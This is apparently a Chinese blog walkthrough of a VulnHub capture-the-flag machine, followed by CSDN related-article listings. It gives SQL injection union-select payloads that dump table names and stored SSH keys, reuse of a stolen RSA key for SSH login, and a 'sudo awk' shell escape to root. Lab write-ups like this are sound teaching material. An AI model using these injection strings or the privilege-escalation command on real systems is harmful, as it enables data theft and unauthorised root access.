vulnhub kfiofan

最新推荐文章于 2024-07-20 15:57:52 发布
最新推荐文章于 2024-07-20 15:57:52 发布
阅读量2.4k 收藏
点赞数
分类专栏: 靶机渗透 web 文章标签: 网络安全 Web渗透 SQL注入 SSH密钥 权限提升
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mrwangtw/article/details/123064722
版权

nmap主机发现和端口扫描

进入80端口

输入用户名admin和密码password,发现不可行,并且有提示

 

提示有Bob用户,根据上面的“网站称”后面的内容可能是某种加密,这里直接在googlemaps输入

得到地点 LaBazouge-de-Chemeré,以此为密码,Bob为用户名,登录,

 点击khaosearch

试一试有没有sql注入的问题 

123" union select 1,2;#

 爆破表和列名

123" union select table_name,column_name from information_schema.columns;#

然后查看ssh_keys 

123" union select * from ssh_keys;#

 直接把里面的rsa内容复制放在本地的id_rsa的里面,用这个id_rsa登录alice

查看本地文件

直接在gtfobins里面搜索提权方法

sudo awk 'BEGIN {system("/bin/sh")}'

 注入即可提权到root

 

mrwangtw
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
vulnhub-Nagini.txt
06-10
Nagini
vulnhub kfiofan2
mrwangtw的博客
02-24 134
nmap主机发现和端口扫描 靶机IP10.0.2.54 直接ftp用anonymous登录把四个图片下载下来,先用exiftool查看属性,也没什么 仔细查看图片,会发现存在隐藏的信息 而且四张图片可以组合成一张完整的图片,这里可以用ppt组合图片,整合之后如下 发现中间存在一个cle.txt,这里ftp进入之后没发现这个文件,看了别人的博客发现,本地创建这个文件,然后上传到ftp的ser目录里面,不得不说渗透靶机做的多了,最需要的还是脑洞 然后再次nmap扫描,发现多了一个h.
vulnhub靶机DC1
weixin_52450702的博客
10-29 929
靶机DC1IP:192.168.70.160。
VulnHub DC1
baynk的博客
05-14 303
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-1,292/ 下载地址2:https://pan.baidu.com/s/1vJFSgn8yKcV6poOyyz35hg 提取码: u17a DC1共有五个flag需要获取 这里我用的是.ova文件,直接导入虚拟机即可。 开肝。 0x02 渗透流程 由于不知道具体的IP地址,nmap扫上。 这里地址比较少,所以发现目标IP为192.168.181.172,探测下端口及服务信息。 开放了22、80、11
vulnhub】DC1
开心星人的博客
06-25 528
下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 我也不太懂,我选了第二个,可以用用vmmare打开DC-1.ova 选设置 要选NAT模式kali也要选NAT模式,这样攻击机和靶机就处于同一内网主机发现 这里用 太大太小的可能是网关,可以看【Try to Hack】ip地址 所以DC-1 的ip为192.168.88.138信息收集 浏览器看看80端口 drupal这个cms搭建的 直接上msf 随便选择一个模块(基本上都能拿到she
Vulnhub篇potato.zip
01-12
Vulnhub篇potato靶机靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
【网络安全科普】勒索病毒 防护指南
最新发布
a38417的博客
07-20 607
常规的杀毒软件查找病毒的原理一般是对当前计算机上的文件进行特征的检测,检测完成后和现有的病毒库中的特征数据进行匹配,如果可以匹配成功则找到病毒文件,因此现有的勒索病毒对我们常用的常规杀毒软件是一个很大的挑战。一旦勒索病毒感染了计算机,它会立即开始加密用户的文件,包括文档、图片、视频等,并在屏幕上显示要求用户支付赎金的消息。从操作系统来看被植入病毒的主要是Windows XP、Windows 7,原因是目前这些系统中有一部分微软官方已经不再支持更新、以及补丁的维护,一般会存在较多的无法及时修复的漏洞。
web安全之跨站脚本攻击xss
奔跑的小猪仔
07-17 945
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。
网络安全防御 -- 双机热备和带宽管理综合实验
rrl18215821889的博客
07-16 576
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 1154
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
云计算监控减少网络安全事件的五种方法
QQ3007250950的博客
07-17 1058
没有充分保护自己的公司很容易受到网络攻击。如果他们使用云计算平台进行操作,这种风险就会增加。如果他们采取适当的安全措施来保护自己,那将是最好的。这些措施的一部分是实施云计算监控,这是一个允许网络安全专业人员主动检测云系统中的漏洞和可疑活动的过程。
2024嘶吼网络安全产业图谱(高清完整版)
2301_76786857的博客
07-16 325
嘶吼安全产业研究院通过全面的市场调研与数据分析,对收录企业进行筛选,重点展示综合能力较高或具有代表性的企业,为行业用户提供更精准的行业参考指南。嘶吼安全产业研究院希望通过本次发布的图谱,能够为各行业、研究机构和政府部门提供有价值的参考,助力他们在网络安全领域取得更大的进展和成就。为了更好的理解当前网络安全产业现状和未来发展方向,嘶吼安全产业研究院在2024年7月16日正式发布。应用与产业安全-工控安全-工控安全信息与事件管理(ICS SIEM)应用与产业安全-工控安全-工控入侵检测系统(ICS IDS)
网络安全(含面试题版)
weixin_65978343的博客
07-17 966
计算机网络覆盖的地理区域决定了它的类型。一般分为局域网(LAN)、城域网(MAN)、广域网(WAN)。 www:是环球信息网的缩写,(英文全称为“World Wide Web”),中文名字为“万维网”,"环球网"等,常简称为Web。 分为Web客户端和Web服务器程序。 IP地址 : 唯一标识网络上的每一台计算机 地址类用于指定网络 ID 并在网络 ID 和主机 ID 之间提供分隔方法 IANA(互联网数字分配机构)是负责协调一些使Internet正常
网络安全----web安全防范
weixin_55357256的博客
07-16 652
以下代码用来防范流行的DDoS攻击,ARP欺骗,CC攻击,XXS攻击,对输入的恶意代码进行过滤,嵌入到web程序可以很好的防范网络攻击,但如果想要更好的防范网络攻击,还需要更加复杂的配置和更硬核的硬件。print(f"可能的 CC 攻击针对资源 {resource} 检测到")# 用于检测 CC 攻击的函数(简单示例,通过监测短时间内对同一资源的请求频率)# 用于检测 XSS 攻击的函数(简单示例,检查输入中是否存在可疑脚本标签)# 用于检测 DDoS 攻击的函数(简单示例,通过监测短时间内的连接数量)
网络安全等级保护测评
weixin_45840241的博客
07-16 472
具体来说,等级保护定级是指根据信息系统在国家安全、社会稳定、经济秩序和公共利益方面的最重要程度以及风险威胁、安全需求、安全成本等因素,将其划分不同的安全保护等级并采取相应等级的安全保护技术、管理措施。通过等级保护测评服务,可以全面检测信息系统的安全性能,发现存在的安全问题和漏洞,及时采取措施进行修复和改进,确保系统具备较高的安全性,降低系统被各种攻击的风险。通过等级保护测评服务,可以帮助组织了解其信息系统的安全状况,提供相应的解决方案,优化安全管理,提高信息安全防护能力。
vulnhub sar
09-09
vulnhub sar是一个类似OSCP的虚拟机,它旨在帮助用户提高和巩固渗透测试的知识点。如果你想下载sar靶机,你可以在GitHub上找到它,具体来说,你可以在pentestmonkey的php-reverse-shell存储库中找到它。如果你已经...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值